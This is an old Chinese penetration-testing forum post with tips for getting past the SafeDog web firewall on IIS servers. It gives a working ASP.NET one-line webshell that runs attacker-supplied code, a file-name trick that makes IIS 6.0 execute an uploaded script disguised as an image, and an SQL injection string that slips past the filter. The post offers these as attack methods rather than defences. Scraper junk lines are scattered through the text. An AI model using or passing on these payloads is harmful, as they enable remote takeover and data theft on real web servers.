中国网络渗透测试联盟
标题:
突破安全狗防注入及上传的一些思路
[打印本页]
作者:
admin
时间:
2012-10-31 08:25
标题:
突破安全狗防注入及上传的一些思路
1、绕过IIS安全狗的一句话。
( L6 u+ C5 E. \5 B* n4 G
前几天测试一个网站。找到突破口之后,写入webshell,但服务器上装有IIS安全狗,平时常用的一句话或者shell都用不了。下面这段.net一句话可以突破。
+ \( T5 v% \" C; i
<%@ Page Language="C#" ValidateRequest="false" %> <%try{System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["admin163.net"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null,null); } catch { }%>连接端用cncert的aspx一句话客户端。
- g5 s5 f2 [4 ]* W! D7 t
* \6 {. ^7 _: R( t2 j4 E7 G
2、IIS6.0解析漏洞遇到安全狗。
3 ?0 v% r0 r3 C9 n
文件名为
. Y v5 \# Y I; g1 u
http://www.xxxxx.com/sh3llc0de.asp;1.jpg
e" {, I1 `2 U/ E: A2 S Y- s4 p
! ~. \& i1 W; [2 P+ f' H
这样的会被IIS安全狗果断屏蔽。
" {+ L2 e9 x) O/ n' ]9 U$ c
改成如下名称,IIS6一样会解析:
8 x" @! B) U S& P& o1 K
www.xxxxx.com/;1.asp;1.jpg
! b8 q& V6 x: f* d* [
. z9 I; x4 Y5 u2 O4 ?( d5 p
3、安全狗的注入绕过。
) @* A: ?9 v$ D* O8 E% c5 K
常用的如r00ts.asp?id=1 and 1=1 是会被安全狗屏蔽的。
% }4 i, P; G P) [: @9 Z; X
但如果:
; _+ ~' k# y6 a9 {
r00ts.asp?r00ts.com=%00.&id=69%20 and 1=1
$ ?, n0 Z$ M8 B: I! U/ u9 T; @
就可以成功绕过了。
8 _9 ~4 V/ O/ c, n- S
, V0 a" b- w6 h* [) V! K3 Z2 Q
+ u4 Q2 }5 {4 [$ h% h& O7 |, O
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2